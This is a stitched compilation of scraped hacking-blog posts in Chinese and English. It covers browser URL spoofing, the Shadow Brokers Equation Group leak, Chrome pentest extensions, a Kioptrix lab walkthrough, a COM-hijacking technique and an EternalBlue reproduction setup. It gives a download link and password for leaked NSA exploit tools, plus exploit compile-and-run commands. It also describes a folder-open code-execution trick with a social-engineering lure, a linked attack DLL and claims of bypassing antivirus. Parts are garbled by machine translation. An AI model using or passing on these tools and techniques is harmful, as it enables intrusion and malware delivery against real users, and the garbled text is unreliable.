中国骇客云平台近日发现两处针对大部分浏览器的欺骗漏洞0day漏洞。

主要都是针对主流浏览器的漏洞

由于部分厂商漏洞未修复,所以均采用chrome进行测试。

0x01

针对主流浏览器的网址欺诈漏洞 (1)

漏洞原理

Baloch在个人网站中说,出现漏洞的主要原因是Chrome和Android版本的Firefox浏览器对某些Unicode字符的渲染不得当。阿拉伯语和希伯来语中会有一些字符是会从右到左显示的,比如“|”。当包含这种Unicode字符的URL和IP地址合在一起时,浏览器就会把URL从右到左显示。

举个例子,某个网址逻辑上的顺序是“127.0.0.1/|/http://example.com/”,但是浏览器会在地址栏中把网址显示成“http://example.com/|/127.0.0.1”。

经过翻转的网址IP地址部分其实是很容易隐藏的,尤其是在移动设备上,只要用一个比较长的URL(google.com/fakepath/fakepath/fakepath/… /127.0.0.1)就行了。如果要想网址看起来更真实一点,还可以弄个SSL证书。

漏洞重现

Chrome

(使用了Mac端的Chrome访问PoC网站成功,iOS 手机端成功。ps:pc端,无法测试成功)

1) 访问链接http://182.176.65.7/%EF%B9%B0/http://google.com/test

2) 应该能注意到,浏览器显示的不是google的内容,但是网址却是http://google.com/test/182.176.65.7

0x02

针对大部分网站的网站欺骗漏洞 (2)

国外网友近日曝出大部分网站都忽视了的安全漏洞,包括 Facebook,Twitter,Google 等都被检测出带有 The target=”_blank” 安全缺陷。

你可以点击 http://tvvocold.coding.me/target_blank_vulnerability/ 测试这个安全问题。带有 target=”_blank” 跳转的网页拥有了浏览器 window.opener 对象赋予的对原网页的部分权限,这可能会被恶意网站利用。

<script language="javascript">window.opener.location = 'https://example.com'</script>

漏洞修复方法:为 target=”_blank” 加上 rel=”noopener noreferrer” 属性。

预计该“安全漏洞”影响了 99% 的互联网网站和大部分浏览器,Instagram 已修复这个问题,有趣的是谷歌拒绝修复这个问题,谷歌认为“这属于浏览器缺陷,不能由单一的网站进行有意义的缓解”。

这个漏洞的可能的利用场景:例如一个恶意网站在用户在 Facebook 打开其页面时,将原页面跳转到伪造的 Facebook 页面,而用户返回到原 tab 时可能会忽视浏览器 URL 已发生了变化,伪造页面即可进一步进行钓鱼或其他恶意行为…

漏洞重现

Chrome

(使用了Mac端的Chrome访问PoC网站成功。)

1)浏览器访问 poc网站:

http://tvvocold.coding.me/target_blank_vulnerability/ 发现原网址为:

别的终端未测试:(

其他浏览器以及网站也存在漏洞,但由于厂商尚未修复漏洞,因此作者还不能透露相关细节。

下个星期注定要发生很多事情,中国骇客云提醒大家ShadowBroker近期将发布多种Windows零日利用工具,黑客圈将发现大量的0day漏洞!

 

北京时间4月14号晚,TheShadowBrokers在steemit.com博客上放出第二波方程式组织Equation Group(为NSA提供服务专门对国外进行间谍活动的组织)的黑客工具包,这是继上周4月8号第一波放出EQGRP-Auction-Files 文件解密密码(http://bobao.360.cn/news/detail/4107.html )之后,又一次的大规模公开的放出解密密码,现在任何感兴趣的人员都可以直接下载解密。

原文件下载地址

https://yadi.sk/d/NJqzpqo_3GxZA4

解密密码

Reeeeeeeeeeeeeee

sha256 hashes

原文件:

7c19a67d728bc700d18d2ed389a80de495681b7097222d9b8f1d696f0986f9a2 odd.tar.xz.gpg

78b89b2c4b129400150c7b60a426ff469aaea31da1588d2abc4180feaa9c41d3 swift.tar.xz.gpg

c28d5c10ec78bc66d3868e4862c7f801ffd561e2116b529e0782bf78f3ef3255 windows.tar.xz.gpg

解密后的文件

85e03866ae7eaaedd9462054b62a10f2180983bdfd086b29631173ae4422f524 odd.tar.xz

df468f01e65f3f1bc18f844d7f7bac8f8eec3664a131e2fb67ae3a55f8523004 swift.tar.xz

5bb9ddfbcefb75d017a9e745b83729390617b16f4079356579ef00e5e6b5fbd0 windows.tar.xz

事件时间轴


1. 在2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shadow Brokers” 还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,“Shadow Brokers” 预期的价格是 100 万比特币(价值接近5亿美元)。而“Shadow Brokers” 的工具一直没卖出去。

2. 北京时间 2017 年 4 月 8 日,“Shadow Brokers” 公布了保留部分的解压缩密码,有人将其解压缩后的上传到Github网站提供下载。

3. 北京时间 2017 年 4 月 14 日晚,继上一次公开解压密码后,“Shadow Brokers” ,在推特上放出了第二波保留的部分文件,下载地址为https://yadi.sk/d/NJqzpqo_3GxZA4,解压密码是 “Reeeeeeeeeeeeeee”。 此次发现其中包括新的23个黑客工具。具体请参考:https://github.com/misterch0c/shadowbroker/blob/master/file-listing

这些黑客工具被命名为OddJob,EasyBee,EternalRomance,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等。

简要分析


有网友在github上传了相关的解密后的文件,通过简单的分析所有的解密后的文件,发现其中包括新的23个黑客工具。具体请参考:https://github.com/misterch0c/shadowbroker/blob/master/file-listing

这些黑客工具被命名为OddJob,EasyBee,EternalRomance,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等

第二波解密的黑客工具包内容包括odd.tar.xz.gpg, swift.tar.xz.gpg and windows.tar.xz.gpg

windows: 包括 Windows利用工具, 植入式的恶意软件 和一些攻击代码

swift: 包括 银行攻击的一些内容

oddjob: 包括与ODDJOB 后门相关的doc

据相关研究人员称:

Windows文件夹包含对Windows操作系统的许多黑客工具,但主要针对的是较旧版本的Windows(Windows XP中)和Server 2003。

其中“ETERNALBLUE是一个0day RCE漏洞利用,影响最新和更新的Windows 2008 R2 SERVER VIA SMB和NBT!”一位名叫Hacker Fantastic在推特上称。

OddJob文件夹包含基于Windows的植入软件,并包括所指定的配置文件和有效载荷。虽然目前这种植入软件的细节很少,但OddJob适用于Windows Server 2003 Enterprise(甚至Windows XP Professional)。

http://p6.qhimg.com/t015ba4451bfeccef37.png

SWIFT文件夹包含PowerPoint演示文稿,证据,凭证和EastNets的内部架构,EastNets是中东最大的SWIFT服务商之一。

http://p7.qhimg.com/t01132e0d08e1958dee.png

SWIFT(全球银行间电信协会)是一个全球性的金融信息系统,全球数千家银行和组织每天都在转移数十亿美元。

该文件夹包括从Oracle数据库查询信息的SQL脚本,如查询数据库用户列表和SWIFT消息。

http://p0.qhimg.com/t01daf09245f711d59a.png

此外,该文件夹还包含Excel文件,表明国安队的精英网络攻击单位方程组织已经入侵,并获得了世界各地许多银行的访问权,其中大多数位于中东,如阿联酋,科威特,卡塔尔,巴勒斯坦,也门。

漏洞影响


根据FOFA系统统计显示,全球对外可能受到影响的超过750万台,中国可能有超过133万受到影响。其中全球约有542万的RDP服务和约有208万的SMB协议服务运行在windows上(仅为分布情况,非实际漏洞影响),其中,中国地区超过101万RDP服务对外开放,SMB协议超过32万。根据白帽汇测试,从windows 2000到Windows2008都受到这工具包中影响,成功率非常之高。另外,内部网络中也大多开启445端口和139端口,也将会成为黑客渗透内网的大杀器。

http://p7.qhimg.com/t01ba55d5d21e1b4f78.png

RDP服务全球分布情况(仅为分布情况,非实际漏洞影响)

http://p3.qhimg.com/t0185d28c29ab76ed6f.png

RDP服务中国地区分布情况(仅为分布情况,非实际漏洞影响)

http://p0.qhimg.com/t01a8371d955af4a702.png

Windows系统上SMB服务全球分布情况(仅为分布情况,非实际漏洞影响)

http://p2.qhimg.com/t01ed92ad8b69cb4f3e.png

Windows系统上SMB服务中国分布情况(仅为分布情况,非实际漏洞影响)

漏洞利用


ETERNALBLUE漏洞利用模块,windows7 sp1 64位版本和windows 2003 sp2 32版本测试成功截图。

http://p8.qhimg.com/t012ec7214f6955918d.png

Windows 7 利用成功并反弹shell

http://p6.qhimg.com/t01f345bbbfdaad0365.png

修复建议


1.升级到微软提供支持的Windows版本,并安装补丁:https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

2.安装相关的防护措施,如缓冲区溢出防御软件,杀毒软件。

3.无补丁的Windows版本,临时关闭135、137、445端口和3389远程登录。

更新:  EastNets否认SWIFT受黑客影响


在今天发表的官方声明中,EastNets否认其SWIFT受到影响,并表示黑客的报道是“完全虚假和毫无根据的”。

“所谓的黑客入侵的EastNets服务商(ENSB)网络的报告是完全虚假的,毫无根据的,EastNets网络内部安全部门对其服务器进行了全面检查,发现没有黑客的足迹或任何漏洞。

Extensions to Turn Google Chrome into Penetration Testing tool hackerschina

Google Chrome is the most popular web browser of the world. It’s light weight and comes with a clean interface. This is the main reason of its popularity. It also has various other features that make website browsing easy and faster. Like Firefox, Chrome also supports add-ons but called extensions for Chrome. Extensions help us in improving the functionality of Google Chrome.

LEARN FROM THE BEST PENETRATION TESTING CLASS

There are thousands of Google Chrome extensions available that add nice tools directly in the browser and reduce the need of installing separate tools for those works. In previous posts, we have covered the Firefox add-ons that make Firefox a security testing tool. Like Firefox, we can also make Google Chrome a security tool with the use of some nice security extensions.

In this post, I have collected all those extensions that help us in the penetration testing process. All these extensions are available for free to download from Google Chrome’s Web store. Few extensions are not available unofficially. So, you need to download from their official website.

Note: Description of tools taken from Official Release Note:

Google Chrome Extensions for Security researchers and penetration testers

  1. Web Developer,
    is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS.
    AddWeb DeveloperExtension in Chrome here:https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm
  2. Firebug Lite for Google Chrome, provides a rich visual environment to analyze HTML elements, DOM elements and other Box Model Shading. It also provides live CSS editing. It helps in analyzing how an application is working on the client’s side.AddFirebug Liteto Google Chrome:https://chrome.google.com/webstore/detail/firebug-lite-for-google-c/bmagokdooijbeehmkpknfglimnifench
  3. d3coder,is another nice Google Chrome extension that helps penetration testers. It enables us to encode and decode selected text via context menu. Thus it reduces the time to encode and decode strings by using separate tools. This extension can perform a wide range of functions. See the list below:
    • Timestamp decoding
    • rot13 en-/decoding
    • base64 encoding
    • base64 decoding
    • CRC32 hashing
    • MD5 hashing
    • SHA1 hashing
    • bin2hex
    • bin2txt
    • HTML entity encoding
    • HTML entity decoding
    • HTML special chars encoding
    • HTML special chars decoding
    • URI encoding
    • URI decoding
    • Quoted printable decoding
    • Quoted printable encoding
    • Escapeshellarg
    • Base64 decode
    • Base64 encode
    • Unserialize
    • L33T-en/decode
    • Reverse

    Add d3coder extension to Google Chrome:https://chrome.google.com/webstore/detail/d3coder/gncnbkghencmkfgeepfaonmegemakcol?hl=en-US

  4. Site Spider, is an extension that adds a crawler in Chrome. It crawls all pages and reports all broken links. One can also restrict the spider by adding restrictions and regular expressions, it works at the client’s side. It can also use your authentication to access all pages. This extension is opensource. So, you can easily modify it according to your needs.
    AddSite Spiderto Google Chrome:https://chrome.google.com/webstore/detail/site-spider/ddlodfbcplakmddhdlffebcggbbighda
  5. Form Fuzzer, is used to populate predefined characters into different form fields. It can also select checkboxes, radio buttons and select items in forms. It has a configuration menu where you can manage all settings of the extension. It is really helpful in testing forms. You can set payloads for forms and then populate payloads quickly with this nice tool. Really helpful in performing XSS and SQL injection attacks.
    AddForm Fuzzerto Google Chrome:https://chrome.google.com/webstore/detail/form-fuzzer/cbpplldpcdcfejdaldmnfhlodoadjhii
  6. Session Manager, is a powerful Chrome extension that lets users save, update, restore, and remove sets of tabs. You can create a group of tabs of the same interest and then restore those pages in one click. If you open few specific pages daily, and create groups of those pages and then open with a single click.
    AddSession Managerto Google Chrome:https://chrome.google.com/webstore/detail/session-manager/mghenlmbmjcpehccoangkdpagbcbkdpc
  7. Request Maker, is a core penetration testing tool. It’s used in creating and capturing requests, tampering the URL, and making new headers with post data. It can capture requests made via forms or XMLHttpRequests. You can see the function of this tool is similar to Burp. It’s also helpful in performing various kind of attacks in a web applications by modifying http requests.
    AddRequest Makerto Google Chrome:https://chrome.google.com/webstore/detail/request-maker/kajfghlhfkcocafkcjlajldicbikpgnp
  8. Proxy SwitchySharp, is a proxy extension that helps in managing and switching between multiple proxies quickly. It also has an option to set auto proxy switching based on URL. You can also import or export data easily. With proxy switcher, we can hide IP addresses and perform penetration testing tasks to check how a person can attack with proxy servers.
    AddProxy SwitchySharpto Google Chrome:https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm/details
  9. Cookie Editor, is a nice Chrome extension that lets users edit cookies. This tool is really helpful while hijacking vulnerable test sessions. It lets users delete, edit, add/or search cookies. It also lets users protect, block or export cookies in json. You can play with cookies as you want. This extension is ad-supported and all revenue goes to Unicef to help children worldwide. But Ads are not necessary and you can disable anytime from the extension settings page.
    Add Edit This Cookie to Google Chrome:https://chrome.google.com/webstore/detail/edit-this-cookie/fngmhnnpilhplaeedifhccceomclgfbg
  10. Cache Killer, is another nice extension that automatically cleans the browser cache before loading pages. It can be easily enabled or disabled with a single mouse click. It’s useful to bypass the browser cache and see the exact website in case it’s changing. This is much useful for web developers.
    AddCache KillerExtension to Google Chrome:https://chrome.google.com/webstore/detail/cache-killer/jpfbieopdmepaolggioebjmedmclkbap
  11. XSS Rays, is a nice extension that helps in finding XSS vulnerability in a website. It finds how a website is filtering the code. It also checks for injections and inspects objects. You can also easily extract, view and edit forms non-destructively even if forms cannot be edited. So many penetration testers use this extension as a dedicated XSS testing tool. It’s pure JavaScript XSS scanner. You canread more about XSS Rays here.
    AddXSS raysto Google Chrome:https://chrome.google.com/webstore/detail/xss-rays/kkopfbcgaebdaklghbnfmjeeonmabidj
  12. WebSecurify, is a powerful cross platform web security testing tool. It’s available for various desktop, mobile platforms and browsers. This is the first web security tool that runs directly from the browser. It’s capable of finding XSS, XSRF, CSRF, SQL Injection, File upload, URL redirection and various other security vulnerabilities. It has a built in crawler that scans and crawls pages. Then it will try to find vulnerability on pages. It’s not a fully automatic tool. It lists possible vulnerability on the URL. You will need to confirm the vulnerability manually. We have already covered the websecurify tool in detail. You can check older posts to read more on how this tool works and how to master websecurify for penetration testing. While scanning, it pulls all features from the WebSecurify server, so you do not need to worry about database updates. The vulnerability engine will be updated at all times. Penetration testing tools are just a click away. Use this either as a browser tool or desktop tool.
    AddWebsecurifyto Google Chrome:https://chrome.google.com/webstore/detail/websecurify/gbecpbaknodhccppnfndfmjifmonefdm
  13. Port Scanner, Google Chrome extension adds port scanning capabilities to the browser. With this extension, you will be able to scan which TCP ports are listening. Port Scanner analyzes any given IP or URL addresses, and then will scan for open ports to help you to secure them. It is also available for Opera and Mozilla Firefox.
    AddPort Scannerto Google Chrome:https://chrome.google.com/webstore/detail/port-scanner/jicgaglejpnmiodpgjidiofpjmfmlgjo
  14. XSS chef, is the popular Chrome extension that works directly in the browser. It helps us in identifying XSS vulnerability in a web application. It’s similar to BeEF but for browsers. It performs following tasks:
    • Monitor open tabs of victims
    • Execute JS on every tab (global XSS)
    • Extract HTML, read/write cookies (also httpOnly), local Storage
    • Get and manipulate browser history
    • Stay persistent until whole browser is closed (or even further if you can persist in extensions’ local Storage)
    • Make screenshot of victims window
    • Further exploit e.g. via attaching BeEF hooks, keyloggers etc.
    • Explore filesystem through file:// protocol
    • Bypass Chrome extensions content script sandbox to interact directly with page JS

    This is not an extension but a framework. So, installation is not same as any other extension. Read the official link of XSS Chef given below and learn how to install it in Chrome.
    AddXSS chefto Google Chrome:https://github.com/koto/xsschef

  15. HPP Finder, is another nice extension. It is useful in finding HTTP Parameter Pollution (HPP) vulnerability and exploit it. This tool can easily detect and exploit the HTML Forms or URLs that might be susceptible of HTTP Parameter Pollution attacks. This tool can only find the vulnerability points but is not a solution against the vulnerability.AddHPP Finderin Google Chrome:https://chrome.google.com/webstore/detail/hpp-finder/nogojgcobcolombicplhimbbakkcmhio
  16. The Exploit Database, is not a penetration testing tool, but it keeps you updated with all latest exploits, shell code and white papers available on Exploit DB server. It’s an open source tool and source code can be found here:http://github.com/10n1z3d/EDBEAddThe Exploit Databaseextension in chrome:https://chrome.google.com/webstore/detail/the-exploit-database/lkgjhdamnlnhppkolhfiocgnpciaiane
  17. GHDB, is a nice Google hack query search. This nice extension help you in searching for necessary Google hack querys for finding specific pages based on special Google search parameters. It allows you in understanding the basis of web security in a better way.
    AddGHDBin Google Chrome:https://chrome.google.com/webstore/detail/ghdb/jopoimgcafajndmonondpmlknbahbgdb
  18. iMacros for Chrome, while performing various web page testing processes, you may need to automate few repetitive tasks on the web. For this, you can use iMacros for Chrome extensions. So, next time when you need this kind of thing, Use the macro and then start it with a click button.InstalliMacros for Chromein Chrome:https://chrome.google.com/webstore/detail/imacros-for-chrome/cplklnmnlbnpmjogncfgfijoopmnlemp
  19. IP Address and Domain Information, is an information gathering extension that can help you in finding geolocation, DNS, whois, routing, search results, hosting, domain neighbors, DNSBL, BGP and ASN information of every IP address (IPv4 and IPv6).Add it to Chrome:https://chrome.google.com/webstore/detail/ip-address-and-domain-inf/lhgkegeccnckoiliokondpaaalbhafoa

How to Install Chrome Extension in the browser

Installation of extension is one click process if it is available in the official Chrome store. But it may be confusing if you have extension code only.

Install from Official Chrome store:To install the extension from official chrome store, just click on the link given below each extension and open the chrome store page of the extension. You will see a blue button saying, “Add to Chrome.”

Figure: Chrome Extension Installation Button

After clicking this button, installation will begin and you will not need to do anything else. It will download a file and then add it to your Chrome. By default, it will activate the extension.

Install Extension manually with source file:Few extensions are not available on official chrome store because they do not meet the terms and conditions of store. So, these are available unofficially on their website. If you want to install those extensions, then download it from the official website. Now open the Chrome extension page and drag the source file and drop it on the extension page. Extension will install automatically after dropping on extensions page.

ETHICAL HACKING TRAINING

If you want to deactivate an extension from Chrome, go to settings and then Extensions page. Here you will see the installed extensions. In front of each extension, you will see a check box. To disable the extension, you only need to de-select the select box. To remove the extension permanently, click on the trash icon near the check box.

Figure: Chrome Extension enable/disable

Conclusion

After reading this post, you will come to know that Chrome is more than just a browser. With these nice extensions, it will become the friend of penetration testers and security researchers. Install these extensions in your browsers and start your penetration testing process. These tools include a wide range from gathering information to performing attacks. Few tools can be used to gather information and inspect the header information of a request. XSS Rays, XSS Chef, HPP Finder and WebSecurify are the most helpful tools that are used widely as security tools.

At last I have also added exploit tools to search for vulnerability, shells and white papers. You can use the exploit search extension to search for an exploit and use it while performing attacks.

Use these tools and share your experience with us. Share which extension you like most via comments.

Kioptrix: Level 1 – Walkthrough Hakcerschina

Kioptrix:1级出现在VulnHub 2月17日TH,2010。由Kioptrix创造的,它可以发现在http:/ / www.vulnhub。COM /进入/ kioptrix-level-1-1,22 /。它是在kioptrix系列的第一机。目的是获得root权限,找到根的电子邮件。

对于攻击机,我将使用卡利2017.1。

一旦启动,这就是受害者的机器看起来像:

我们开始攻击通过寻找受害者的机器的IP使用netdiscover命令:

netdiscover美元

现在,我们知道我们的目标IP地址,我们通过扫描端口开始试图得到更多的信息:

扫描显示,下面的端口是打开的:

  • 端口22运行OpenSSH–
  • 端口80–运行Apache Web服务器
  • –运行RPC端口111
  • 端口139奔跑的桑巴
  • 端口443–运行Apache。我们的服务器通过SSL
  • –运行RPC端口1024

访问Web应用程序(端口80上通过HTTP:/ /和端口443通过HTTPS://)我们只看到一个默认的测试页

此外,我没有发现任何在他们的源代码,非常有趣。回头看到正在运行的服务,Samba是让我感兴趣的事情。所以,我对它运行一个枚举:

enum4linux美元一172.16.92.138 &#62; output.txt

这给了我们很多的信息包括Samba版本正在使用中,2.2.1a。在做一个简单的漏洞,我看到一个远程执行代码漏洞是可用的:

searchsploit Samba 2.2美元

我将利用到根目录C开发

美元exploitdb CP / usr /分享/ / / / / 10.c Linux平台远程exploit.c

然后我编译开发经GCC

海湾合作委员会-桑巴exploit.c美元

给我最后的文件权限:

chmod 755美元的桑巴

让我们干运行的利用和看到所有参数是必需的:

那么好吧,我想我们已经准备好使用这:

桑巴美元。/ B 0 C 172.16.92.133 172.16.92.138

我们是在以root权限!现在我们需要找到邮件。

我/无功/邮件下找到的电子邮件:

道德黑客培训–资源(信息安全)

虽然玩它,我发现机器可以利用另一种方式通过Metasploit(2003 201 CVE):

使用美元开发/ Linux /桑巴/ trans2open

另一种方式进入机是通过利用mod_ssl(CVE 2002–0082)。我发现它的开发https://www.exploit-db.com /漏洞/ 764/

海合会- O openfuck美元746。C lcrypto

注:由于利用的是旧的,你可以更新通过以下教程:http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/。另外,请记住,你将在你编译的开发需要libssl和libssl dev。

让我们利用!

美元/ openfuck 0x6b 172.16.92.138 443 C 40

Kioptrix: Level 1 surfaced on VulnHub on February 17th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root’s email.

For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscovercommand:

$ netdiscover

Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 22 – Running OpenSSH
  • Port 80 – Running Apache Web server
  • Port 111 – Running RPC
  • Port 139 – Running Samba
  • Port 443 – Running Apache. We server over ssl
  • Port 1024 – Running RPC

Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:

Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it:

$ enum4linux -a 172.16.92.138 > output.txt

This gives us a lot of information including the Samba version is being used, 2.2.1a. Upon doing a simple exploit, I see that a Remote Code Execution exploit is available:

$ searchsploit samba 2.2

I copy the exploit to the root directory as exploit.c:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

then I compile the exploit via gcc:

$ gcc -o samba exploit.c

I am given the final file proper permissions:

$ chmod 755 samba

Let’s dry run the exploit and see what all parameters are required:

Okay then, I think we are ready to use this:

$ ./samba -b 0 -c 172.16.92.133 172.16.92.138

And we are in with root privileges! Now we need to find the email.

I found the email under /var/mail:

ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

While playing around it with more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):

$ use exploit/linux/samba/trans2open

Another way of getting into the machine was via exploit mod_ssl (CVE 2002 – 0082). I found its exploit at https://www.exploit-db.com/exploits/764/

$ gcc -o OpenFuck 746.c -lcrypto

Note: Since the exploit is old, you can update it by following the following tutorial:http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will require libssl and libssl-dev before you compile the exploit.

Let’s exploit!

$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40

中国骇客云教你COM劫持利用新型牛逼办法!

打开文件夹就能运行指定的程序?这不是天方夜谭,而是在现实世界中确实存在的。利用本文探讨的COM劫持技术,可以轻松实现出打开文件夹就运行指定代码的功能。对于COM劫持技术COM劫持技术,国内很少有资料进行原理阐述,本文结合自身分析经验对COM劫持技术进行归纳总结。同时,希望各大安全厂商针对此类利用做好防护,保护用户信息安全。

前言

所谓“骂人先骂娘,擒贼先擒王”,首先给出读者最最关心的劫持文件夹的利用方法的效果展示:

打开文件夹就运行?COM劫持利用新姿势

为了理解本文内容,我们首先要了解COM的一些基本的概念

  • 接口:一组函数的总称,这些函数也被称为”方法”,接口的名称都是以“I”开关,如:”IShellFolder”.接口可以继承。
  • Component object class(coclass):也就是组件,组件包含在一个DLL或者exe文件中,它包含了一个或多个接口的实现代码。组件实现了它包含的所有接口。
  • COM object:是组件的一个实例。
  • COM server:一个dll或者exe文件,包含了一个或者多个组件。
  • COM library:是操作系统的一部分,负责响应用户程序。
  • GUID:唯一的、128位的标识对象的标识. 全局唯一标识符,是唯一的一个ID,类似于物理网址那样。
  • CLSID:class id,唯一的标识组件。
  • IID:interface id,用来标识接口。

 

此外,对于windows操作系统,存在着虚拟文件夹,控制面板,我的电脑等都是系统中的虚拟文件夹。这种虚拟文件夹在注册表中都会有一个CLSID与之对应,例如,我的电脑对应的CLSID是{20D04FE0-3AEA-1069-A2D8-08002B30309D},控制面板的CLSID是{21EC2020-3AEA-1069-A2DD-08002B30309D}

那么怎样可以看到这些虚拟文件夹呢?以“我的电脑”虚拟文件夹为例,在开始–运行中输入”: {20D04FE0-3AEA-1069-A2D8-08002B30309D”就可以打开我的电脑。但需要注意的是,在WIN7下,输入:{21EC2020-3AEA-1069-A2DD-08002B30309D}可以打开控制面板,但在xp系统下,打开控制面板需要输入的命令为:”:{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}”。

利用方法

作为演示,我们执行代码的功能为,弹出一个类似与下图的对话框,其中显示出了调用这个DLL的进程路径及PID信息。

把大象装进冰箱里需要三步,我们的利用也分为三步:

 

1.精选CLSID,尽量选择系统应用范围广的CLSID,这样的模块可以保证系统在进行很多功能时都会加载dll。

我们选择的CLSID为:{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7},其对应着CAccPropServicesClass类。

修改注册表,将CLSID对应的DLL文件修改成实现了某些待定功能的文件(这个文件是由我们精心构造的,不然无法利用成功)。

可通过将下列数据导入到注册表实现

 

2. 新建文件夹,以CLSID做为后缀名,同时将我们的利用dll拷贝到系统目录下:

这里的文件名可以充分发挥想象力(骗术),利用社会工程学,起个诱惑的文件夹名,比如,目标喜欢日本姑娘,文件夹就叫做” 小泽にほんごかなニホンゴ(カナ).{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}”

14746372851780

3. 打开文件夹,成功利用

利用的步骤很简单,其中最为关键是我们实现代码的dll以及CLSID的选择,这不是一个普通的dll,而是dll中的”战斗dll”,这是一个实现了COM接口的dll,并且在dll的导出函数的返回值有特殊要求。具体可以参见文末附件中的代码。

背后的故事

通过上面的图,可以看出,我们的DLL实际上是由verclsid.exe加载的。而verclsid.exe是通过shell32.dll中的函数调用起来的。在shell32.dll中SHExtCoCreateInstance函数成功调用后,verclsid.exe才会被加载。

而SHExtCoCreateInstance只是对_SHExtCoCreateInstance2的封装

14746372917267

而通过ida看到_SHExtCoCreateInstance2调用了_ShouldLoadShellExt,所有_ShouldLoadShellExt成功返回(返回非0值),才能加载verclsid.exe.

14746372953873

_ShouldLoadShellExt在对注册表Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked和Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved进行判断后,调用了_QueryClassInterface,而要求_QueryClassInterface返回一个非0值,就只能是下图中的 v17=ExitCode==0代码的地方。

14746376272810

综全上面的过程,要想成功利用,只要使CreateProcessW函数调用verclsid.exe结束时的exitcode等于0。

对verclsid.exe分析

调用verclsid.exe传递的参数有:

  • /S:随后调用OLE32!CoInitializeEx函数时的参数;
  • /C : CLSID;
  • /I :Interface id;
  • /X:调用OLE32!CoCreateInstance函数时所需要的参数值;

随后,通过下面的函数调用com组件

调用OLE32!CoCreateInstance

1474637308484

调用ppv->QueryInterface

1474637314975

随后会调用

ppv->Release()

CoUninitialize()

然后,函数就正常返回,当函数正常返回时,verclsid.exe的exitcode等于0。这就保证了我们的dll能够被加载成功。

所以,我们只需要写一个COM服务dll,使verclsid.exe调用这个服务dll的接口时,返回S_OK就OK了。具体关于COM服务dll的编写,请参考附件链接。

附件下载:链接:链接: https://pan.baidu.com/s/1mijwuTE 密码: sshr

总结

这种COM劫持技术最大的优点在于,不需要进行动态的dll注入等操作,可以绕开主动防御,此外,这种利用的加载进行为操作系统的verclsid.exe,宿主进程是天生的白进程,也可以绕开白名单机制。而且劫持dll的加载是由系统底层机制决定的。另外,这种技术很可能被用于网络黑产,这也要求安全厂商提高对这种劫持行为的识别与检测。

中国骇客云之火狐浏览器Firefox渗透利器:Firefox Security Toolkit 使用时请使用翻译功能!

14664997136695

实现方法
它会下载重要的扩展,并将之安装在浏览器上。通过在信息安全社区的调查,选择了一些有用的扩展,写了这款Firefox Security Toolkit工具。同时,它也可以下载Burp Suite证书和user-agent列表,用于User-Agent Switcher插件。通过一次点击,实现一个web应用测试浏览器。

与OWASP Mantra、Hcon STF的不同之处
OWASP Mantra和Hcon STF不会定期更新,而且要想开发和维护需要做很多工作。而对于Firefox Security Toolkit,我只会在需要的时候修复一些问题和bug,不需要其它额外的维护。用到的扩展是从Mozilla的Addons Store中下载的最新版本,给渗透测试人员提供最好的用户体验。

适用人群
Web应用渗透测试人员,信息安全研究者,以及其他对web应用安全感兴趣的人。

兼容性
这个项目目前支持Linux/Unix环境。

下载地址:下载地址


 可用的插件:

Cookie Export/Import
Cookie Manager
Copy as Plain Text
Crypto Fox
CSRF-Finder
Disable WebRTC
FireBug
Fireforce
FlagFox
Foxy Proxy
HackBar
Live HTTP Headers
Multi Fox
PassiveRecon
Right-Click XSS
Tamper Data
User Agent Switcher
Wappalyzer
Web Developer

附加功能:

下载user-agent列表,供User-Agent Switcher使用

中国骇客云方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

最近方程式的漏洞着实火了一把,根据网友的需求分析了下githup上面的文件目录,找到了利用文件,
主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,
利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议

1 .环境搭建

win2003 攻击机:ip:192.168.0.28
kali 攻击机:ip:192.168.0.27
win7 靶机:ip:192.168.0.14

PS:netstat -an 查看端口开发情况,确保445端口开启

另外:win2003攻击机需要安装有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。

